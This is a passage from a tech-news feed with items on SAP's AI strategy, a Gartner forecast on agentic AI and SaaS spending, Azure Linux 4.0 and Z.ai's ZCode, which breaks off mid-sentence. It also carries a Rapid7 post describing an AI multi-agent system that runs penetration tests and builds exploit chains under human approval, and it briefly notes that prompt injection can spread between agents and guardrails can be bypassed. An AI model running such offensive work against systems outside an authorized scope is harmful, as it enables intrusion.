<p>This is yet another part of the SAP’s efforts to accelerate its focus on AI, including its digital assistant, Joule. Earlier this week, CEO <a href="https://www.cio.com/article/4191505/sap-reshuffles-exec-oversight-of-ai.html">Christian Klein took on direct responsibility</a> for most of its AI development teams. In March, Klein had passed oversight of sales, delivery, service, and support to the new <a href="https://www.cio.com/article/4139431/sap-reshuffles-executive-responsibilities-as-it-goes-all-in-on-ai.html">Customer Value Group</a> under executive board member Thomas Saueressig, now chief customer officer.</p>



<h2 class="wp-block-heading">Customers need to see value</h2>



<p><a href="https://www.infotech.com/profiles/terra-higginson" target="_blank" rel="nofollow">Terra Higginson</a>, principal research director at Info-Tech Research Group, said that while SAP needs AI adoption to support its strategy and justify its investments, “customers still need to see a clearer value proposition before they commit more budget or operational attention.”</p>



<p>Like many software companies, SAP is facing multiple pressures, she said: SaaS valuations remain significantly below prior-cycle highs, AI is expensive to build, operate, and scale, and the commercial payoff from AI remains uncertain.</p>



<p>“This is not a time for lavish spending,” she said. “SAP needs to be disciplined about where it invests, focusing on areas that create clear competitive differentiation. Joule has been underwhelming so far, yet I hear that SAP is pushing users hard to turn it on. That creates a real tension.”</p>



<h2 class="wp-block-heading">Reshaping the workforce</h2>



<p>AI is also behind SAP’s attempt to avoid layoffs like those that occurred during its <a href="https://www.cio.com/article/3477211/sap-restructuring-to-impact-more-jobs-than-expected.html">2024 restructuring</a>. The company is encouraging employees to invent “more valuable jobs,” assisted by the new technologies, <a href="https://www.nytimes.com/2026/07/02/world/europe/germany-sap-ai-jobs-skilled-workers.html" target="_blank" rel="nofollow">The New York Times reported</a>. The report said that in the not too distant future, CEO Klein is expecting to see not a smaller workforce, but a very different one; he is not sure whether there will be any people coding software in two or three years.</p>



<p><a href="https://moorinsightsstrategy.com/team/jason-andersen/" target="_blank" rel="nofollow">Jason Andersen</a>, VP and principal analyst at Moor Insights &amp; Strategy, said that when workers use AI a lot, it changes how they interact with their daily tasks. For example, software engineers are now doing more security and testing tasks as their time is freed up from coding.</p>



<p>“But, this rebalancing of work is the big challenge that hasn’t been worked out yet,” he said. “That is the missing link in this whole future-of-work story and how that translates to today’s worker. And that has three major mitigating factors that at least temporarily disrupt good intentions.”</p>



<p>First, he said, AI tends to be a personal productivity enhancer and is not yet team friendly. Second, “There’s an argument that AI will enable us to be so much more productive since we can now do those things that we could not before. Except that those things never really had a strong enough case to begin with. So, will we use this new capacity to do that or just cut the budget?”</p>



<p>And thirdly, he pointed out, “macro views get sorted out in years and decades, not months and quarters. AI will change jobs, and, if you believe the research suggesting automation actually increases the number of jobs over time (which I do), it will work itself out.”</p>



<p>SAP and other companies must do these things to stay competitive over the long run, he said, but, “In the short run, a lot of companies will have to scale back to move forward, which is of little consolation to those impacted.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Los agentes de IA ponen en riesgo 234.000 millones de dólares del gasto empresarial en SaaS, según Gartner]]></title>
<description><![CDATA[“Ya no se compra software principalmente para personas; cada vez se compra más para agentes”, explica George Brocklehurst, vicepresidente ejecutivo de Gartner. “Durante un par de décadas, el software se ha evaluado por su interfaz y por la experiencia de usuario: facilidad de uso, flujos de traba...]]></description>
<link>https://tsecurity.de/de/3642941/it-nachrichten/los-agentes-de-ia-ponen-en-riesgo-234000-millones-de-dlares-del-gasto-empresarial-en-saas-segn-gartner/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642941/it-nachrichten/los-agentes-de-ia-ponen-en-riesgo-234000-millones-de-dlares-del-gasto-empresarial-en-saas-segn-gartner/</guid>
<pubDate>Fri, 03 Jul 2026 09:48:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>“Ya no se compra software principalmente para personas; cada vez se compra más para agentes”, explica George Brocklehurst, vicepresidente ejecutivo de Gartner. “Durante un par de décadas, el <a href="https://www.computerworld.es/article/4188279/especial-desarrollo-de-software-2026.html">software </a>se ha evaluado por su interfaz y por la experiencia de usuario: facilidad de uso, flujos de trabajo, formación. Cuando los agentes de IA se convierten en el usuario principal, todo eso pierde valor”.</p>



<p>Gartner estima que el gasto expuesto representará alrededor del 20% del gasto empresarial en SaaS al final de la década. La consultora atribuye este cambio al fenómeno que denomina ‘arbitraje agentivo’ (<em>agentic arbitrage</em>), es decir, el uso de agentes de IA para completar tareas empresariales a través de múltiples sistemas corporativos, reduciendo la necesidad de que los empleados interactúen directamente con cada aplicación.</p>



<p>Según Brocklehurst, la IA agentiva está cambiando la economía del software. Estos sistemas suelen omitir los flujos tradicionales de uso del software y entregar directamente los resultados, rompiendo así la relación histórica entre el crecimiento del número de usuarios y el crecimiento de los ingresos de muchos proveedores de software empresarial.</p>



<h2 class="wp-block-heading">Los CIO deberán replantearse la adquisición de software</h2>



<p>La aparición de la IA agentiva obligará a los CIO a evaluar el software empresarial de otra manera. En lugar de centrarse principalmente en la experiencia de usuario y el diseño de las interfaces, las organizaciones deberán analizar si los agentes de IA pueden realizar, mediante API, todas las funciones que hoy ejecutan los usuarios humanos a través de pantallas y aplicaciones.</p>



<p>“Lo realmente importante es determinar si un agente puede hacer todo —e incluso más— a través de la API de un sistema que lo que una persona puede realizar mediante una interfaz gráfica, y si las condiciones del proveedor lo permiten”, afirma Brocklehurst.</p>



<p>Este cambio también afecta a la forma de evaluar los contratos de software. “Examine el contrato con la misma atención con la que examina la tecnología”, recomienda. “Las condiciones de los proveedores pueden prohibir o restringir —desde el punto de vista técnico o financiero— el uso autónomo por parte de terceros. Los CIO podrían descubrir que su estrategia de IA está bloqueada no por una limitación tecnológica, sino por cláusulas que ya firmaron”.</p>



<p>Por ello, aconseja que las organizaciones negocien desde ahora los permisos para el uso de agentes en sus acuerdos de software, ya que muchos contratos seguirán vigentes cuando los agentes de IA se generalicen.</p>



<h2 class="wp-block-heading">La propiedad del conocimiento será el próximo campo de batalla</h2>



<p>Más allá de las API y las licencias, las empresas deberán prestar especial atención a dónde se almacena el conocimiento generado por los sistemas de IA. Cada corrección, excepción o flujo de trabajo gestionado por un agente crea conocimiento organizativo. Gartner denomina Knowledge Retention Rate (KRR) o tasa de retención del conocimiento a la capacidad de una organización para conservar ese aprendizaje.</p>



<p>“Si ese conocimiento acaba alimentando los modelos compartidos del proveedor, la experiencia operativa de su empresa estará mejorando un producto que también utilizan sus competidores”, señala Brocklehurst. “La cláusula más importante de la próxima generación de contratos de software será: “¿Quién es el propietario de lo que el sistema aprende de usted?””.</p>



<p>Según Gartner, las empresas corren el riesgo de caer en una nueva forma de dependencia tecnológica (vendor lock-in) si ese aprendizaje operativo permanece en manos de los proveedores y no de los clientes.</p>



<h2 class="wp-block-heading">El modelo económico tradicional del SaaS afronta una disrupción</h2>



<p>Gartner sostiene que los agentes de IA capaces de ejecutar procesos en múltiples aplicaciones empresariales reducirán la interacción directa de los usuarios con las interfaces tradicionales, debilitando el vínculo histórico entre el uso del software y las licencias basadas en número de usuarios.</p>



<p>Ante este escenario, los proveedores consolidados deberán evolucionar desde una propuesta de valor centrada en la interfaz hacia otra basada en los resultados, incorporando capacidades agentivas directamente en los procesos de negocio y preservando el conocimiento específico de cada cliente.</p>



<p>Al mismo tiempo, las <em>startups </em>nativas de IA y los proveedores de servicios podrían beneficiarse al convertirse en la capa de orquestación encargada de coordinar el trabajo entre múltiples aplicaciones empresariales. “Aunque este cambio supone una amenaza existencial para los proveedores que siguen defendiendo modelos basados en paneles de control tradicionales y licencias por usuario, también crea una importante oportunidad de ingresos para quienes desarrollen servicios y plataformas capaces de soportar flujos de trabajo transversales impulsados por agentes”, indica Brocklehurst.</p>



<h2 class="wp-block-heading">La gobernanza debe evolucionar junto con los sistemas autónomos</h2>



<p>Gartner también insta a los CIO a establecer marcos de gobernanza antes de que los agentes autónomos de IA se conviertan en algo habitual. “No conceda autonomía de forma implícita ni desigual”, advierte Brocklehurst. Las organizaciones deben tratar la autonomía de los agentes como una decisión explícita de gobierno corporativo, definiendo dónde pueden actuar de forma independiente, quién autoriza esas decisiones y con qué frecuencia deben revisarse esos permisos.</p>



<p>“Las empresas que desarrollen esa capacidad desde ahora podrán avanzar más rápido y con mayor seguridad cuando la tecnología esté preparada para asumir más responsabilidades”, concluye.</p>



<p>Aunque Gartner describe esta transición como una redefinición del concepto de ‘Saaspocalypse’, Brocklehurst subraya que el SaaS no desaparecerá. “Esto es menos un apocalipsis y más una metamorfosis. El SaaS no será destruido; simplemente emergerá bajo una forma diferente”.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Akamai Completes Acquisition of Secure Enterprise Browser Provider LayerX]]></title>
<description><![CDATA[It enables security teams to have greater visibility into how users interact with web content, prompts, file uploads, and SaaS applications both ...]]></description>
<link>https://tsecurity.de/de/3642113/it-security-nachrichten/akamai-completes-acquisition-of-secure-enterprise-browser-provider-layerx/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642113/it-security-nachrichten/akamai-completes-acquisition-of-secure-enterprise-browser-provider-layerx/</guid>
<pubDate>Thu, 02 Jul 2026 21:20:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<b>It</b> enables <b>security</b> teams to have greater visibility into how users interact with web content, prompts, file uploads, and SaaS applications both ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Formalizing Red Teaming Offensive Methodology as a Multi-Agent AI Architecture]]></title>
<description><![CDATA[Threat actors are integrating AI into their exploit chains, accelerating reconnaissance, automating vulnerability discovery, and scaling social engineering in ways that compress the timeline between initial access and impact. The barrier to sophisticated offensive operations is dropping fast.Rapi...]]></description>
<link>https://tsecurity.de/de/3641499/it-security-nachrichten/formalizing-red-teaming-offensive-methodology-as-a-multi-agent-ai-architecture/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641499/it-security-nachrichten/formalizing-red-teaming-offensive-methodology-as-a-multi-agent-ai-architecture/</guid>
<pubDate>Thu, 02 Jul 2026 16:38:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>Threat actors are integrating AI into their exploit chains, accelerating reconnaissance, automating vulnerability discovery, and scaling social engineering in ways that compress the timeline between initial access and impact. The barrier to sophisticated offensive operations is dropping fast.</span></p><p><span>Rapid7's Red Team is doing the same. Over the past year we formalized our approach into a structured multi-agent system that follows our penetration testing methodology end-to-end from scoping an engagement to validating findings to generating reports. We built it as a production system, not a proof of concept, and the process of designing and operating it taught us as much about defending against AI-enhanced attacks as it did about conducting them.</span></p><p><span>The system also proved its value as part of Anthropic's </span><a href="https://www.rapid7.com/blog/post/ai-rapid7-accesses-anthropics-project-glasswing-exploring-frontier-artificial-cybersecurity-intelligence/" target="_self"><span>Project Glasswing initiative</span></a><span>. Glasswing is a program that gives leading security companies early access to frontier cyber models before they reach wider availability, enabling security research that stays ahead of malicious adoption. We infused our red team architecture with Claude Mythos, applying it across penetration testing, vulnerability research, and red team operations. The combination of our formalized multi-agent architecture with a frontier-class model produced exceptional results in vulnerability analysis and exploit chain development. This validated both the architecture's design and the importance of getting these capabilities into defenders' hands first.</span></p><p><span>This post covers the architecture, the key design decisions, and what we learned along the way.</span></p><h2>Why Rapid7's Red Team built a multi-agent system</h2><p><span>Penetration testing is labor-intensive by nature as a significant portion of any engagement is spent on structured, repeatable work like enumerating attack surfaces, tracing data flows through source code, checking security headers, documenting findings in a consistent format. The actual judgement — deciding what to test next, assessing exploitability, understanding business impact — remains deeply human.</span></p><p><span>The opportunity was straightforward: offload the mechanical work to AI agents while maintaining human insight at decision points where it matters most. Those decision points are where engagements succeed or fail: scoping what's in and out of bounds, choosing which attack paths to pursue based on business context, assessing whether a vulnerability is genuinely exploitable in a given environment, deciding when a finding is significant enough to escalate, and interpreting results in ways that translate to actionable risks. None of that is mechanical, it requires experience, judgement, and context that models routinely get wrong. And as an internal security team, we don't just report vulnerabilities, we're accountable for coverage. If something ships with an exploitable flaw we missed, that's on us. The bar for confidence is high, and that's why humans stay in the loop at every point that matters.</span></p><p><span>We also had a secondary motivation. Building a system that follows a structured offensive methodology gives us direct architectural insight into how AI agents behave in adversarial contexts including the capabilities, the limitations, and the failure modes. That understanding now informs how we assess and secure Rapid7's own AI-powered products.</span></p><h2>The architecture: Orchestration, not autonomy</h2><p><span>The system isn't a single monolithic agent but a team of specialist agents coordinated by an orchestrator that mirrors how human red teams operate. The orchestrator doesn't test anything. It assesses the current state of the engagement, determines what needs to happen next, routes work to the appropriate specialist, and processes the results. Specialist agents handle enumeration, code review, dynamic testing, and reporting.Each with defined inputs, outputs, and constraints.</span></p><p><span>The architectural choice to use supervisor-style orchestration rather than a monolithic agent separates routing decisions from execution. This makes the system more predictable, auditable, and controllable,properties that matter when the agent is operating in sensitive environments.</span></p><p><span>The key design decision that made this work was methodological, not technical. We reverse-engineered the agent's architecture directly from our team's daily task lists. The to-do items our testers tracked during real engagements became the specification: which tasks repeat, in what sequence, where decisions branch, and what triggers a return to an earlier phase. The methodology we'd built over years of engagements became the orchestration logic.</span></p><h2>Scope decomposition: Giving every target full attention</h2><p><span>One of the earliest lessons we learned was that throwing an entire engagement scope at an AI agent produces shallow, scattered results. LLMs have finite context windows and finite attention. A complex application with dozens of endpoints, multiple authentication flows, and layered business logic overwhelms a single-pass analysis and important details get lost in the noise.</span></p><p><span>The solution was deliberate scope decomposition. Before the agent begins any technical work, the engagement scope is broken into discrete, manageable chunks.  The scope includes individual components, feature areas, or functional boundaries. Each chunk flows through the full architecture independently: enumeration, code review, dynamic testing, and reporting. The orchestrator tracks which chunks are complete, which are in progress, and which are queued.</span></p><p><span>This achieves two things. First, it ensures depth over breadth as each component receives the agent's full analytical attention rather than competing for context space with everything else. Second, it creates natural parallelization opportunities and clear progress tracking. A tester can see exactly which areas have been thoroughly assessed and which remain.</span></p><p><span>The principal maps directly to how experienced pentesters already work by breaking the target into logical units, going deep on each one, then synthesizing across them. Making the principal explicit and enforceable in the orchestration logic was the design contribution.</span></p><h2>Feedback loops: Why linear pipelines fail</h2><p><span>Real penetration tests don't follow a straight line. Code review reveals new endpoints that need enumeration. Dynamic testing uncovers an attack surface that wasn't visible from source alone. Validated findings sometimes expose entirely new subsystems.</span></p><p><span>The agent handles this natively. The orchestrator maintains a routing table with progression gates — criteria that must be met before advancing — and feedback triggers that route the engagement backward when new actionable data emerges. This creates a directed graph with re-entry points, not a waterfall.</span></p><h2>Guardrails: Maintaining safety in a malicious context</h2><p><span>Building an AI agent that can hack is relatively straightforward but building one that operates safely within defined boundaries is a challenge. So it was an area where we invested significant design effort.</span></p><p><span>The system uses a tiered safety model:</span></p><ul><li><p><span>Scope enforcement — every action is validated against the engagement's authorized scope before execution. Out-of-scope discoveries are reported but never probed.</span></p></li><li><p><span>Action classification — before execution, every proposed dynamic test is categorized as non-destructive, destructive, or ambiguous. Destructive and ambiguous actions require human approval.</span></p></li><li><p><span>Human-in-the-loop by default — in our current deployment, a tester reviews and approves every dynamic test. The agent proposes; the human decides.</span></p></li></ul><p><span>The system is designed with a path toward semi-automated operation where low-risk, read-only actions execute autonomously while state-modifying operations still require human approval. The decision about where to sit on that spectrum is context-dependent. Internal labs can tolerate more autonomy while client engagements demand more oversight.</span></p><h2>Token efficiency: Making AI practical</h2><p><span>AI agents are expensive to run at scale. Every enumeration step, every code block analyzed, every HTTP request reasoned about will consume tokens. It is a practical concern that shaped several design decisions. </span></p><p><span>The approach was to identify mechanical tasks that don't require LLM reasoning and replace them with deterministic scripts and MCP servers. DNS lookups, header checks, input field probing, and certificate enumeration produce structured data that the agent consumes, but the data collection itself doesn't need intelligence. This reduced token consumption dramatically for enumeration-heavy phases while letting the AI focus its reasoning budget on analysis, correlation, and judgement.</span></p><p><span>Not every step in an AI workflow needs AI. Knowing where to draw that line was the difference between a demo and a production system for us.</span></p><h2>Securing AI from the inside out</h2><p><span>There's a dimension to this work that goes beyond offensive operations. Rapid7 builds AI-powered products. As the internal security team, we're responsible for securing those systems and building a complex multi-agent architecture gave us direct insight into where the weak points live.</span></p><p><span>Designing the orchestrated system taught us exactly how prompt injection can propagate between agents, where trust boundaries blur when one agent's output becomes another's input, how guardrails can be bypassed through indirect manipulation, and what happens when scope enforcement relies on instruction-following rather than programmatic controls.</span></p><p><span>We now test Rapid7's AI features with the same architectural intuition we developed building this system. We know where to look because we've built the same patterns and felt where they flex. When we assess an AI system's safety, we're thinking like the orchestrator — looking for the routing decision that can be subverted, the progression gate that can be skipped, the feedback loop that can be poisoned.</span></p><p><span>Building offensive AI made us materially better at defending the AI we ship to customers.</span></p><h2>What we learned operating the multi-agent system</h2><p><span>A few observations from our team:</span></p><h3><span>Methodology is the differentiator</span></h3><p><span>The LLMs are commodities. The orchestration patterns are emerging in open literature. What makes an AI agent effective at penetration testing is the methodology it follows and that's built from years of institutional knowledge. Formalizing our methodology into explicit, machine-executable logic was the most valuable part of the project.</span></p><h3><span>Building AI builds intuition for securing AI</span></h3><p><span>The architectural understanding we developed — trust boundaries, prompt propagation, scope enforcement failures — translates directly into more effective security assessments of production AI systems. This was an unexpected but significant return on the investment.</span></p><h3><span>The automation spectrum is context dependent</span></h3><p><span>Full autonomy isn't a goal; it's one end of a spectrum. The right level of automation depends on the context.Internal labs, client engagements, and product integrations each have different risk profiles. Designing for the spectrum rather than a fixed endpoint kept the system flexible.</span></p><h2>What's next for Rapid7 Red Teaming in the age of AI</h2><p><span>We're continuing to develop the system, refining the methodology mapping, expanding specialist capabilities, and exploring where purpose-built models could replace general-purpose LLM calls for specific tasks (such as severity classification, report writing, payload selection). We're also using what we learn from operating this system to inform how Rapid7 detects and responds to AI-enhanced offensive activity in the wild. </span></p><p><span>You can learn more about Vector Command, Rapid7's continuous red-teaming solution, </span><a href="https://www.rapid7.com/services/continuous-red-team-service" target="_self"><span>here</span></a><span>.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft stellt Azure Linux 4.0 kostenlos zur Verfügung]]></title>
<description><![CDATA[Azure Linux 4.0 basiert auf Fedora 43 und erhält Sicherheits-Updates von Microsoft.Microsoft



Azure Linux 4.0 – ein Open-Source-Betriebssystem auf Linux-Basis – wurde auf der Entwicklerkonferenz Build 2026 von Microsoft vorgestellt. Im Gegensatz zu früheren Versionen soll Microsofts Linux-Distr...]]></description>
<link>https://tsecurity.de/de/3641372/it-security-nachrichten/microsoft-stellt-azure-linux-40-kostenlos-zur-verfuegung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641372/it-security-nachrichten/microsoft-stellt-azure-linux-40-kostenlos-zur-verfuegung/</guid>
<pubDate>Thu, 02 Jul 2026 15:53:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/Azure-Linux-4.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Azure Linux 4" class="wp-image-4190988" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Azure Linux 4.0 basiert auf Fedora 43 und erhält Sicherheits-Updates von Microsoft.</p></figcaption></figure><p class="imageCredit">Microsoft</p></div>



<p><a href="https://learn.microsoft.com/en-us/azure/azure-linux/whats-new-azure-linux-4">Azure Linux 4.0</a> – ein Open-Source-Betriebssystem auf Linux-Basis – wurde auf der Entwicklerkonferenz <a href="https://www.computerwoche.de/article/4180429/build-2026-microsoft-stellt-autonomen-ki-agenten-auf-basis-von-openclaw-vor.html" target="_blank">Build 2026</a> von Microsoft vorgestellt. Im Gegensatz zu früheren Versionen soll Microsofts Linux-Distribution nun kostenlos verfügbar sein.</p>



<p>Technisch basiert Azure Linux 4.0 auf Fedora 43 und nutzt dasselbe <a href="https://de.wikipedia.org/wiki/RPM_Package_Manager" target="_blank" rel="noreferrer noopener">RPM-basierte Paketverwaltungssystem</a>. <a href="https://www.windowslatest.com/2026/06/29/microsoft-called-linux-a-cancer-now-ships-its-own-free-distro-thats-nothing-like-ubuntu-or-fedora/" target="_blank" rel="noreferrer noopener">Berichten</a> zufolge wurde das Linux-Derivat optimiert, um Workloads auf dem Azure-Cloud-Dienst auszuführen. Um Fehlerbehebungen und Sicherheits-Updates will sich Microsoft kümmern.</p>



<p>Azure Linux 4.0 ist nicht für Endverbraucher konzipiert und deshalb textbasiert. Deswegen beträgt die Größe auch nur knapp unter 300 Megabyte.</p>



<p>Es kann ab sofort über den <a href="https://marketplace.microsoft.com/sv-se/product/saas/microsoftazurelinux.azurelinux-4?tab=overview" target="_blank" rel="noreferrer noopener">Microsoft Marketplace</a> heruntergeladen werden. (tf)</p>



<p>Dieser Artikel ist im <a href="https://computersweden.se/article/4190975/microsoft-gor-azure-linux-4-0-gratis-att-anvanda.html">Original</a> bei unserer Schwesterpublikation Computersweden.se erschienen.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Agentic AI puts $234B in enterprise SaaS spending at risk, Gartner says]]></title>
<description><![CDATA[AI agents are poised to challenge traditional enterprise software business models, placing up to $234 billion in application software spending at risk by 2030 as they increasingly bypass human users and interact directly with business systems, according to Gartner.



“You are no longer buying so...]]></description>
<link>https://tsecurity.de/de/3641147/it-nachrichten/agentic-ai-puts-234b-in-enterprise-saas-spending-at-risk-gartner-says/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3641147/it-nachrichten/agentic-ai-puts-234b-in-enterprise-saas-spending-at-risk-gartner-says/</guid>
<pubDate>Thu, 02 Jul 2026 14:33:32 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>AI agents are poised to challenge traditional enterprise software business models, placing up to $234 billion in application software spending at risk by 2030 as they increasingly bypass human users and interact directly with business systems, according to Gartner.</p>



<p>“You are no longer buying software primarily for people; you are increasingly buying it for agents,” George Brocklehurst, managing vice president at Gartner, told <em>CIO</em>. “For a couple of decades, software has been evaluated on the interface, the user experience: usability, workflow, training. When AI agents become the primary user, all that depreciates.”</p>



<p>Gartner estimates that the exposed spending would account for about 20% of enterprise software-as-a-service (SaaS) spending by the end of the decade.</p>



<p>Gartner attributes the shift to what it calls “agentic arbitrage,” or the use of AI agents to complete business tasks across multiple enterprise systems, reducing the need for employees to interact directly with individual software interfaces.</p>



<p>Agentic AI changes the economics of software, Brocklehurst said, adding that these systems often bypass traditional software and deliver outcomes directly, breaking the link between user growth and revenue growth for many enterprise software vendors.</p>



<h2 class="wp-block-heading">CIOs may need to rethink software procurement</h2>



<p>The emergence of agentic AI will require CIOs to evaluate enterprise software differently, Brocklehurst said.</p>



<p>Instead of focusing primarily on user experience and interface design, organizations should assess whether AI agents can perform every business function through application programming interfaces (APIs) that human users can perform through application screens, he said.</p>



<p>“What really matters, as a starting point, is whether an agent can do everything—and more—through the system’s API that a human can do through a screen, and whether a vendor’s terms permit that,” he said.</p>



<p>That also changes how software contracts should be evaluated.</p>



<p>“Scrutinize the contract as much as you scrutinize the technology,” Brocklehurst said. “Vendors’ terms can prohibit or restrict — technically or financially — third-party autonomous use. CIOs may find their AI strategy blocked not by capability but by clauses they have already signed.”</p>



<p>He advised organizations to negotiate agent permissions into software agreements now because many existing contracts will remain in force when enterprise AI agents become mainstream.</p>



<h2 class="wp-block-heading">Knowledge ownership becomes the next battleground</h2>



<p>Beyond APIs and licensing, organizations should pay close attention to where AI systems retain operational learning, Brocklehurst said.</p>



<p>Every correction, exception, and workflow handled by an AI agent creates organizational knowledge, he said. Gartner refers to an organization’s ability to retain that knowledge as its Knowledge Retention Rate (KRR).</p>



<p>“If it accrues to the vendor’s shared models, your operational experience is improving a product your competitors also use,” Brocklehurst told CIO. “The most important clause in the next generation of software contracts is: ‘Who owns what the system learns from you?’”</p>



<p>According to Gartner, enterprises risk a new form of vendor lock-in if operational learning remains with software providers rather than the customer.</p>



<h2 class="wp-block-heading">Traditional SaaS economics face disruption</h2>



<p>According to Gartner, AI agents that execute work across multiple enterprise applications could reduce direct user interaction with traditional software interfaces, weakening the long-standing link between software usage and seat-based licensing.</p>



<p>Gartner said incumbent software providers should shift from interface-based value to outcome-based value, while embedding agentic capabilities directly into business processes and preserving customer-specific knowledge.</p>



<p>At the same time, AI-native startups and service providers could benefit by becoming the orchestration layer that coordinates work across multiple enterprise applications.</p>



<p>“While this shift is posing an existential threat for vendors who are defending legacy dashboards and seat-based models, it creates a substantial revenue opportunity for vendors who are enabling and developing services and platforms to support agentic-enabled cross-domain workflows,” Brocklehurst said.</p>



<h2 class="wp-block-heading">Governance should evolve with autonomous systems</h2>



<p>Gartner also urged CIOs to establish governance frameworks before autonomous AI agents become commonplace.</p>



<p>“Do not grant autonomy implicitly or unevenly,” Brocklehurst said. Organizations should treat agent autonomy as an explicit governance decision, defining where agents can operate independently, who authorizes those decisions, and how frequently those permissions should be reviewed.</p>



<p>“The companies that build that muscle now will move faster, and more safely, when the technology is ready for more,” he said.</p>



<p>Although Gartner described the transition as a redefinition of the long-discussed “Saaspocalypse,” Brocklehurst said SaaS itself would evolve rather than disappear. “This is less an apocalypse and more of a metamorphosis,” he said. “SaaS will not be destroyed; it will emerge in a different form.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Z.ai launches ZCode to challenge Cursor, Claude Code and GitHub Copilot in AI coding]]></title>
<description><![CDATA[Z.ai, the Beijing-based artificial intelligence lab formerly known as Zhipu AI, on Wednesday officially launched ZCode, a free desktop application it describes as an "Agentic Development Environment" purpose-built for its flagship GLM-5.2 large language model. The move marks the company's most ag...]]></description>
<link>https://tsecurity.de/de/3640860/it-nachrichten/zai-launches-zcode-to-challenge-cursor-claude-code-and-github-copilot-in-ai-coding/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640860/it-nachrichten/zai-launches-zcode-to-challenge-cursor-claude-code-and-github-copilot-in-ai-coding/</guid>
<pubDate>Thu, 02 Jul 2026 13:01:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="http://z.ai/">Z.ai</a>, the Beijing-based artificial intelligence lab formerly known as Zhipu AI, on Wednesday officially launched <a href="https://zcode.z.ai/">ZCode</a>, a free desktop application it describes as an "Agentic Development Environment" purpose-built for its flagship <a href="https://z.ai/blog/glm-5.2">GLM-5.2</a> large language model. The move marks the company's most aggressive push yet into the fast-growing AI-powered coding tool market, where it now competes directly with <a href="https://cursor.com/get-started">Cursor</a>, <a href="https://www.anthropic.com/product/claude-code">Claude Code</a>, <a href="https://github.com/features/copilot">GitHub Copilot</a>, and <a href="https://antigravity.google/">Google's Antigravity</a>.</p><p>"Introducing ZCode, the official development environment for GLM-5.2," the company wrote on X, noting the tool is available on macOS, Windows, and Linux, supports bring-your-own-key (BYOK) configurations for third-party models, and offers a 1.5x usage-quota bonus for subscribers to its GLM Coding Plan.</p><p>Read one way, <a href="https://zcode.z.ai/">ZCode</a> is simply another entrant in a crowded market. Read another, it is a single product that crystallizes three of the most consequential trends in enterprise software today: the race-to-the-bottom pricing of frontier AI models, the geopolitical balkanization of the AI stack, and the rapid maturation of agentic coding agents into what Gartner now estimates is a <a href="https://enterprisedna.co/resources/news/gartner-enterprise-ai-coding-agents-10-billion-market-2026/">roughly $10 billion market</a>.</p><div></div><h2><b>An AI coding tool designed to think in projects, not prompts</b></h2><p>Unlike traditional IDEs that bolt on AI through a chat sidebar or autocomplete extension, <a href="https://zcode.z.ai/">ZCode</a> is best understood as an agent-first development environment. Its core design is built around long-horizon tasks: the user describes an outcome, the agent plans the work, edits files, runs checks, reviews progress, and continues across multiple iterations until the goal is met.</p><p><a href="https://zcode.z.ai/">ZCode</a> organizes the development experience around the <a href="https://zcode.z.ai/en">ZCode Agent</a>, deeply tuned for <a href="https://z.ai/blog/glm-5.2">GLM-5.2</a>, with emphasis on deep integration: the model, tools, and execution workflow are tuned together so the Agent fits continuous, multi-step real-world development tasks. The environment supports continuous follow-up across devices: desktop, mobile Remote, and Feishu / WeChat Bot can all keep the same workspace task moving. Sensitive commands, file changes, and high-permission actions go through confirmation before execution.</p><p>That remote-control feature — the ability to steer a running coding agent from <a href="https://www.wechat.com/en">WeChat</a>, <a href="https://baike.baidu.com/en/item/Feishu/14594">Feishu</a>, or <a href="https://web.telegram.org/">Telegram</a> on a phone — is a differentiator that speaks directly to the Chinese developer market, where those messaging platforms dominate professional communication. You can keep checking progress and adding instructions while long-running work continues, from any device with these messaging apps.</p><p>The tool is free to download. Revenue flows through Z.ai's <a href="https://z.ai/subscribe">GLM Coding Plan subscription tiers</a>, which start at $16.20 per month for a "Lite" plan and scale to $144 per month for "Max" — prices that undercut Anthropic's Claude Code and Cursor's comparable tiers by significant margins.</p><p>Through July 31, <a href="https://zcode.z.ai/">ZCode</a> is offering a promotional 1.5x effective quota bonus for Coding Plan subscribers, with off-peak token consumption charged at a 